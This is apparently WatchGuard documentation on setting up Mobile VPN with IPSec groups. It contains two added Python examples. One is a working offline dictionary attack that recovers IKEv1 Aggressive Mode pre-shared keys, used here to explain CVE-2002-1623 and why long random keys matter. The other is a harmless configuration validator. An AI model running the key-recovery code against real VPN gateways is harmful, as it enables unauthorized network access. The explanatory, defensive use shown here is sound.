Configure the Firebox for Mobile VPN with IPSec
You can enable Mobile VPN with IPSec for a group of users you have already created, or you can create a new user group. The users in the group can authenticate either to the Firebox or to a third-party authentication server included in your Firebox configuration.
For more information about how to add users to a group for local Firebox authentication, go to Add Users to a Firebox Mobile VPN Group. If you use a third-party authentication server, follow the instructions in the documentation from the manufacturer.
To limit mobile VPN connections to devices that follow corporate policy, you can use Network Access Enforcement. Before you enable Network Access Enforcement for Mobile VPN with IPSec groups in the Authentication > Servers configuration, enable and configure Network Access Enforcement at Subscription Settings > Network Access Enforcement (Fireware v12.9 and higher).
In Fireware v12.5.4 to v12.8.x, this feature was called TDR Host Sensor Enforcement. TDR is now end of life and cannot be used for network access enforcement. The TDR Host Sensor Enforcement setting still appears in the user interface because the configuration schema requires it, but it no longer functions. To enable network access enforcement, we recommend that you upgrade to EDR Core. For more information, go to this Knowledge Base article: Host Sensor Upgrade to Endpoint Security.
For more information about Network Access Enforcement, go to Network Access Enforcement Overview.
For information about how to enable Network Access Enforcement for IPSec groups, go to Add Users to a Firebox Mobile VPN Group.
The IKEv1 Aggressive Mode vulnerability described in CVE-2002-1623 affects Mobile VPN with IPSec. We recommend that you configure a certificate instead of a pre-shared key if you have a WSM Management Server. If you do not have a Management Server, we recommend that you specify a strong pre-shared key and change it on a regular basis. We also recommend that you specify a strong hashing algorithm such as SHA-256.
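To see why this page pairs CVE-2002-1623 with the advice to use a long, random pre-shared key (the group passphrase also serves as the tunnel pre-shared key when the "Use the passphrase of the end user profile as the pre-shared key" option is selected), here is an added Python example. It is not WatchGuard documentation or code; it follows the RFC 2409 pre-shared-key derivation for Aggressive Mode, and the capture values, the wordlist and the PSK_ALPHABET it generates from are constructed assumptions.

```python
"""Offline guessing of an IKEv1 Aggressive Mode pre-shared key (added example).

In Aggressive Mode the responder's HASH_R travels unencrypted, and every other
input to it (nonces, DH public values, cookies, SA payload, responder ID) is
visible on the wire. RFC 2409 defines, for pre-shared-key authentication:

    SKEYID = prf(psk, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

so each PSK candidate costs two HMACs to test, with no interaction needed.
"""
import hmac
import math
import secrets
import string

# Printable ASCII subset assumed safe for the group passphrase field; the page
# only says "standard ASCII", so the exact punctuation allowed is an assumption.
PSK_ALPHABET = string.ascii_letters + string.digits + "-_!@#$%^&*"


def prf(key: bytes, data: bytes, hash_name: str = "sha256") -> bytes:
    """IKEv1 prf for the negotiated hash is HMAC-<hash> (RFC 2409 section 3.2)."""
    return hmac.new(key, data, hash_name).digest()


def hash_r(psk: bytes, capture: dict, hash_name: str = "sha256") -> bytes:
    """Recompute HASH_R from a PSK candidate and the public exchange values."""
    skeyid = prf(psk, capture["ni"] + capture["nr"], hash_name)
    body = (capture["gxr"] + capture["gxi"] + capture["cky_r"] + capture["cky_i"]
            + capture["sai_b"] + capture["idir_b"])
    return prf(skeyid, body, hash_name)


def make_capture(psk: bytes, hash_name: str = "sha256") -> dict:
    """Constructed stand-in for Aggressive Mode message 2 as a sniffer sees it.
    Fixed bytes replace real nonces and DH values so the example is deterministic."""
    capture = {
        "ni": bytes.fromhex("11" * 32), "nr": bytes.fromhex("22" * 32),
        "gxi": bytes.fromhex("33" * 128), "gxr": bytes.fromhex("44" * 128),
        "cky_i": bytes.fromhex("0102030405060708"),
        "cky_r": bytes.fromhex("0807060504030201"),
        "sai_b": bytes.fromhex("0000000100000001"),          # placeholder SA payload body
        "idir_b": b"\x03\x00\x00\x00" + b"mvpn-group@example.com",  # constructed responder ID
        "hash_name": hash_name,
    }
    capture["hash_r"] = hash_r(psk, capture, hash_name)  # what the responder sends in clear
    return capture


def recover_psk(capture: dict, candidates):
    """Offline dictionary attack: return the first candidate whose HASH_R matches."""
    target = capture["hash_r"]
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand, capture, capture["hash_name"]), target):
            return cand
    return None


def generate_psk(length: int = 32) -> str:
    """Strong ASCII-only pre-shared key for the group passphrase field."""
    return "".join(secrets.choice(PSK_ALPHABET) for _ in range(length))


def psk_entropy_bits(psk: str) -> float:
    """Upper-bound entropy: each character uniform over the character classes present."""
    space = 0
    if any(c.islower() for c in psk): space += 26
    if any(c.isupper() for c in psk): space += 26
    if any(c.isdigit() for c in psk): space += 10
    if any(c in "-_!@#$%^&*" for c in psk): space += 10
    return len(psk) * math.log2(space) if space else 0.0


WORDLIST = [b"watchguard", b"password", b"password123", b"Summer2024!", b"vpn"]  # constructed

if __name__ == "__main__":
    print("weak PSK recovered:", recover_psk(make_capture(b"password123"), WORDLIST))
    strong_psk = generate_psk()
    print("strong PSK recovered:", recover_psk(make_capture(strong_psk.encode()), WORDLIST))
    print(f"generated PSK is about {psk_entropy_bits(strong_psk):.0f} bits")
```

Selecting SHA-256 instead of MD5 or SHA-1 for the prf only changes the cost of each guess; the loop is the same, so the length and randomness of the passphrase, or switching to certificates, is what defeats the offline attack. An attacker does not even need to sniff a legitimate user: initiating Aggressive Mode to the responder with a guessed group identity returns HASH_R directly, which is why rotating the key limits exposure but does not prevent the capture.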
Configure a Mobile VPN with IPSec Group
To configure Mobile VPN with IPSec for a group of users, you add a Mobile VPN with IPSec group configuration.
In Fireware v12.2.1 or lower, the steps to configure Mobile VPN with IPSec are different: in Fireware Web UI, select VPN > Mobile VPN with IPSec instead of VPN > Mobile VPN.
Configure a Group from Fireware Web UI
- Select VPN > Mobile VPN.
The Mobile VPN selection page appears.
- In the Mobile VPN with IPSec section, click Configure.
The Mobile VPN with IPSec list appears.
- Click Add.
The Mobile User VPN with IPSec Settings page appears.
- In the Name text box, type a name for this Mobile VPN group.
You can type the name of an existing group or the name for a new Mobile VPN group. Make sure the name is unique among VPN group names as well as all interface and VPN tunnel names.
If you create a Mobile VPN user group that authenticates to an external authentication server, make sure you create a group on the server with the same name you specified in the wizard for the Mobile VPN group. If you use Active Directory as your authentication server, the users must belong to an Active Directory security group with the same name as the group name you configure for Mobile VPN with IPSec. For more information, go to Configure the External Authentication Server.
- Configure these settings to edit the group profile:
Authentication Server
Select the authentication server to use for this Mobile VPN group. You can authenticate users with the internal Firebox database (Firebox-DB) or with a RADIUS, VASCO, SecurID, LDAP, or Active Directory server. Make sure that the method of authentication you choose is enabled.
Passphrase
Type a passphrase to encrypt the Mobile VPN profile (.wgx file) that you distribute to users in this group. The shared key can use only standard ASCII characters. If you use a certificate for authentication, this passphrase is also used to encrypt the exported certificate file you send to users.
Confirm
Type the passphrase again.
Primary
Type the primary external IP address to which Mobile VPN users in this group can connect. This can be an external IP address, secondary external IP address, or external VLAN. For a device in drop-in mode, use the IP address assigned to all interfaces.
If your Firebox has a dynamic IP address, you can specify a domain name for client connections instead of an IP address. To connect to the mobile VPN, users specify the domain name in the mobile VPN client settings. Make sure to register the external IP address of your Firebox with a dynamic DNS service provider. Optionally, you can enable dynamic DNS on the Firebox to automatically send IP address updates to a dynamic DNS service provider that the Firebox supports. For more information about dynamic DNS, go to About the Dynamic DNS Service.
Backup
Type a backup external IP address to which Mobile VPN users in this group can connect. This backup IP address is optional. If you add a backup IP address, make sure it is an IP address assigned to an external interface or VLAN.
Session Timeout
Select the maximum time in minutes that a Mobile VPN session can be active.
Idle Timeout
Select the time in minutes before the Firebox closes an idle Mobile VPN session. The session and idle timeout values are the default timeout values if the authentication server does not have its own timeout values. If you use the Firebox as the authentication server, the timeouts for the Mobile VPN group are always ignored because you set timeouts for each Firebox user account.
The session and idle timeouts cannot be longer than the value in the SA Life field.
To set this value, in the Mobile VPN with IPSec Settings dialog box, click the IPSec Tunnel tab, and click Advanced for Phase 1 Settings. The default value is 8 hours.
- Select the IPSec Tunnel tab.
The IPSec Tunnel page opens.
- Configure these settings:
Use the passphrase of the end user profile as the pre-shared key
Select this option to use the passphrase of the end user profile as the pre-shared key for tunnel authentication. You must use the same shared key on the remote device. This shared key can use only standard ASCII characters.
Use a certificate
Select this option to use a certificate for tunnel authentication.
For more information about Mobile VPN with IPSec certificates, see Certificates for Mobile VPN With IPSec Tunnel Authentication (Web UI).
CA IP address
If you use a certificate, type the IP address of the Management Server that has been configured as a certificate authority.
Timeout
If you use a certificate, type the time in seconds before the Mobile VPN with IPSec client stops an attempt to connect if there is no response from the certificate authority. We recommend you keep the default value.
Phase 1 Settings
Select the authentication and encryption methods for the VPN tunnel. To configure advanced settings, such as NAT Traversal or the key group, click Advanced, and see Define Advanced Phase 1 Settings.
The Encryption options are listed from weakest to strongest. DES and 3DES remain only for compatibility with old clients and should not be selected for new deployments; use an AES option:
- DES
- 3DES
- AES (128 bit)
- AES (192 bit)
- AES (256 bit) (default setting)
Phase 2 Settings
By default, PFS (Perfect Forward Secrecy) is enabled. From the drop-down list, select the Diffie-Hellman group.
To change other proposal settings, click Advanced and see Define Advanced Phase 2 Settings.
- Select the Resources tab.
The Resources page appears.
- Configure these settings:
Allow All Traffic Through Tunnel
To send all Mobile VPN user Internet traffic through the VPN tunnel, select this check box.
If you select this check box, the Mobile VPN user Internet traffic is sent through the VPN. This is more secure, but network performance decreases.
If you do not select this check box, Mobile VPN user Internet traffic is sent directly to the Internet. This is less secure, but users can browse the Internet more quickly.
Allowed Resources
This list includes the resources that users in the Mobile VPN authentication group can get access to on the network.
To add an IP address or a network IP address to the network resources list, click Add. Select Host IPv4 or Network IPv4, type the address, and click OK.
To delete the selected IP address or network IP address from the resources list, select a resource and click Remove.
Virtual IP Address Pool
This list includes the internal IP addresses that are used by Mobile VPN users over the tunnel.
To add an IP address or a network IP address to the virtual IP address pool, click Add. Select Host IPv4 or Network IPv4, type the address, and click OK.
To remove it from the virtual IP address pool, select a host or network IP address and click Remove.
WARNING: The IP addresses in the virtual IP address pool cannot be used for anything else on your network.
For more information about virtual IP addresses, see Virtual IP Addresses and Mobile VPNs.
- Select the Advanced tab.
The Advanced page appears.
- Configure the Line Management settings:
Connection mode
Manual — In this mode, the client does not try to restart the VPN tunnel automatically if the VPN tunnel goes down. This is the default setting.
To restart the VPN tunnel, you must click the Connect button in Connection Monitor, or right-click the Mobile VPN icon on your Windows desktop toolbar and click Connect.
Automatic — In this mode, the client tries to start the connection when your computer sends traffic to a destination that you can reach through the VPN. The client also tries to restart the VPN tunnel automatically if the VPN tunnel becomes unavailable.
Variable — In this mode, the client tries to restart the VPN tunnel automatically until you click Disconnect. After you disconnect, the client does not try to restart the VPN tunnel again until you click Connect.
Inactivity timeout
If Connection mode is set to Automatic or Variable, the Mobile VPN with IPSec client software does not try to renegotiate the VPN connection until there has been no traffic to or from the network resources available through the tunnel for the length of time you enter for Inactivity timeout.
The default Line Management settings are Manual and 0 seconds. If you change either setting, you must use the .ini file to configure the client software.
- (Fireware v12.2.1 or higher) Configure the DNS settings:
Assign the network DNS/WINS settings to mobile clients
If you select this option, mobile clients receive the DNS and WINS settings you specify at Network > Interfaces > DNS/WINS. For example, if you specify the DNS server 203.0.113.50 in the Network DNS/WINS settings, mobile VPN clients use 203.0.113.50 as a DNS server.
By default, the Assign the Network DNS/WINS Server settings to mobile clients setting is selected for new mobile VPN configurations.
Do not assign DNS or WINS settings to mobile clients
If you select this option, clients do not receive DNS or WINS settings from the Firebox.
Assign these settings to mobile clients
If you select this option, mobile clients receive the domain name, DNS server, and WINS server settings you specify in this section. For example, if you specify example.com as the domain name and 203.0.113.50 as the DNS server, mobile clients use example.com for unqualified domain names and 203.0.113.50 as the DNS server.
You can specify one domain name, up to two DNS server IP addresses, and up to two WINS server IP addresses.
For more information about DNS and WINS server settings for Mobile VPN with IPSec users, see Configure DNS and WINS Servers for Mobile VPN with IPSec.
- Click Save.
The Mobile VPN with IPSec page opens and the new IPSec group appears in the Groups list.
- Click Save.
Configure a Group from Policy Manager
- Select VPN > Mobile VPN > IPSec.
The Mobile VPN with IPSec Configuration dialog box appears.
- Click Add.
The Add Mobile VPN with IPSec Wizard appears.
- Click Next.
The Select a user authentication server screen appears.
- From the Authentication Server drop-down list, select an authentication server.
You can authenticate users to the Firebox (Firebox-DB) or to a RADIUS, VASCO, SecurID, LDAP, or Active Directory server. Make sure that this method of authentication is enabled in Policy Manager. Select Setup > Authentication > Authentication Servers to see these settings.
- In the Group Name text box, type the name of the group.
You can type the name of a Mobile VPN group you have already created, or type a group name for a new Mobile VPN group. Make sure the name is unique among VPN group names, as well as all interface and tunnel names.
For more information about VPN group authentication, go to Types of Firebox Authentication.
If you create a Mobile VPN user group that authenticates to an external authentication server, make sure you create a group on the server with the same name you specified in the wizard for the Mobile VPN group. If you use Active Directory as your authentication server, the users must belong to an Active Directory security group with the same name as the group name you configure for Mobile VPN with IPSec. For more information, go to Configure the External Authentication Server.
- Click Next.
The Select a tunnel authentication method screen appears.
- Select an option for tunnel authentication:
- Use this passphrase
Type and confirm the passphrase.
- Use an RSA certificate issued by your WatchGuard Management Server
Type the IP Address of your Management Server and the Administration Passphrase.
For more information about how to use an RSA certificate, go to Certificates for Mobile VPN With IPSec Tunnel Authentication (Web UI).
- Click Next.
The Direct the flow of Internet traffic screen appears.
- Select an option for Internet traffic:
- No, allow Internet traffic to go directly to the mobile user's ISP.
(Split tunneling)
- Yes, force all Internet traffic to flow through the tunnel.
(Default-route VPN)
For more information about split tunneling and default-route VPN, go to Options for Internet Access Through a Mobile VPN with IPSec Tunnel.
- Click Next.
The Identify the resources accessible through the tunnel screen appears.
- Click Add to specify the host or network IP addresses that users can connect to through the VPN tunnel.
- Click Next.
The Create the virtual IP address pool screen appears.
- Click Add to add one IP address or an IP address range.
To add more virtual IP addresses, repeat this step.
Mobile VPN users are assigned an IP address from the virtual IP address pool when they connect to your network. Because each connected user holds one address, the pool must contain at least as many addresses as the number of Mobile VPN users that can connect.
WARNING: The virtual IP addresses must be on a different subnet than the local networks. The virtual IP addresses cannot be used for anything else on your network.
For more information about virtual IP addresses, go to Virtual IP Addresses and Mobile VPNs.
- Click Next.
If you used a certificate for tunnel authentication, the Encrypt the VPN configuration file screen appears.
- Type and confirm the passphrase to use to encrypt the .wgx configuration file and the PKCS#12 certificate that is saved when you generate the VPN configuration file from Policy Manager.
If you used a passphrase for tunnel authentication, the wizard skips this step and the tunnel passphrase you specified earlier is used to encrypt the VPN configuration file.
- Click Next.
The Add Mobile VPN with IPSec Wizard has completed successfully screen appears.
- To add users to the new Mobile VPN with IPSec group, select the Add users check box.
- Click Finish.
The Mobile VPN with IPSec group user configuration file is available at the location specified on this screen.
After the wizard completes, you can edit the group profile you just created to:
- Change the shared key
- Add access to more hosts or networks
- Restrict access to a single destination port, source port, or protocol
- Change the Phase 1 or Phase 2 settings
- (Fireware v12.2.1 or higher) Specify DNS and WINS server settings
For more information about DNS and WINS server settings for Mobile VPN with IPSec users, go to Configure DNS and WINS Servers for Mobile VPN with IPSec.
To edit the profile, go to Modify an Existing Mobile VPN with IPSec Group Profile.
When you add a Mobile VPN with IPSec group, a Mobile VPN with IPSec Any policy is automatically created to allow all traffic from users in the group to the resources available through the tunnel. For more information about Mobile VPN with IPSec policies, go to Configure Policies to Filter IPSec Mobile VPN Traffic.
Users who are members of the group you create are not able to connect until they import the correct configuration file in their WatchGuard IPSec Mobile VPN Client software. You must generate the configuration file and then provide it to the end users. For more information, go to Generate Mobile VPN with IPSec Configuration Files.
Troubleshoot Mobile VPN with IPSec
If users cannot connect to the VPN or to network resources, check for these common causes:
- Incorrect DNS settings
- Disabled or deleted policies
- Incorrect user group settings
- IP address pool overlap
- Incorrect route settings
For more troubleshooting information, go to Troubleshoot Mobile VPN with IPSec.
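Several of the causes in the list above (IP address pool overlap, incorrect group settings) correspond to rules stated earlier on this page: a unique group name, an ASCII-only passphrase, a virtual IP pool on its own subnet with one address per user, and timeouts no longer than the SA Life. The following Python script is an added example, not WatchGuard tooling, that checks a planned group profile against those rules before you click Save. The group values, local networks, existing names and the 20-character passphrase floor are constructed assumptions.

```python
"""Pre-flight check of a Mobile VPN with IPSec group profile (added example).

Checks the values you are about to type into the Web UI or wizard against the
rules this page states, so the common causes listed under troubleshooting are
caught before Save. Names, addresses and limits below are constructed.
"""
import ipaddress
from dataclasses import dataclass


@dataclass
class MobileVpnGroup:
    name: str
    passphrase: str            # also the tunnel pre-shared key when that option is selected
    virtual_ip_pool: list      # "Host IPv4" or "Network IPv4" entries as typed in the UI
    allowed_resources: list    # hosts/networks users may reach through the tunnel
    expected_users: int
    session_timeout_min: int
    idle_timeout_min: int
    sa_life_hours: int = 8     # Phase 1 SA Life; the page says the default is 8 hours


def to_networks(entries):
    """Accept '10.0.1.5' (host) or '10.0.1.0/24' (network), as the UI does."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def pool_addresses(pool):
    """Upper bound on assignable addresses: every address in every entry."""
    return sum(n.num_addresses for n in to_networks(pool))


def preflight(group: MobileVpnGroup, local_networks, existing_names):
    """Return a list of problems; an empty list means the profile passes."""
    errors = []

    # Name must be unique among VPN group, interface and tunnel names.
    # Case-insensitive comparison is a conservative assumption.
    taken = {n.lower() for n in existing_names}
    if group.name.lower() in taken:
        errors.append(f"name {group.name!r} collides with an existing group, interface or tunnel name")

    # Passphrase: standard ASCII only; the length floor is an assumption for a PSK.
    pw = group.passphrase
    if not pw.isascii() or not pw.isprintable():
        errors.append("passphrase must use only printable standard ASCII characters")
    elif len(pw) < 20:
        errors.append("passphrase shorter than 20 characters is too weak for a pre-shared key")

    # Virtual IP pool: must not overlap local networks, allowed resources, or itself.
    pool = to_networks(group.virtual_ip_pool)
    in_use = to_networks(list(local_networks) + list(group.allowed_resources))
    for p in pool:
        for n in in_use:
            if p.overlaps(n):
                errors.append(f"virtual IP pool entry {p} overlaps {n}, which is already used on the network")
    for i, p in enumerate(pool):
        for q in pool[i + 1:]:
            if p.overlaps(q):
                errors.append(f"virtual IP pool entries {p} and {q} overlap each other")

    # One address per connected user.
    have = pool_addresses(group.virtual_ip_pool)
    if have < group.expected_users:
        errors.append(f"pool has {have} addresses for {group.expected_users} users")

    # Session and idle timeouts cannot be longer than the Phase 1 SA Life.
    sa_life_min = group.sa_life_hours * 60
    for label, val in (("session", group.session_timeout_min), ("idle", group.idle_timeout_min)):
        if val > sa_life_min:
            errors.append(f"{label} timeout {val} min exceeds SA Life of {sa_life_min} min")
    return errors


if __name__ == "__main__":
    # Constructed profile that makes several of the mistakes the page warns about.
    bad = MobileVpnGroup(name="Trusted", passphrase="pass", virtual_ip_pool=["10.0.1.0/24"],
                         allowed_resources=["10.0.1.0/24"], expected_users=300,
                         session_timeout_min=600, idle_timeout_min=30)
    for problem in preflight(bad, ["10.0.1.0/24", "10.0.2.0/24"], ["Trusted", "External", "BovpnToHQ"]):
        print("-", problem)
```

Run it against the values you plan to enter; a clean run does not replace checking that the authentication server group exists and the Mobile VPN with IPSec policy is enabled, but it removes the address-overlap and naming mistakes that are hardest to spot after the fact.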
Generate Mobile VPN with IPSec Configuration Files
Configure Windows Server 2016 or 2012 R2 to authenticate mobile VPN users with RADIUS and Active Directory in the WatchGuard Knowledge Base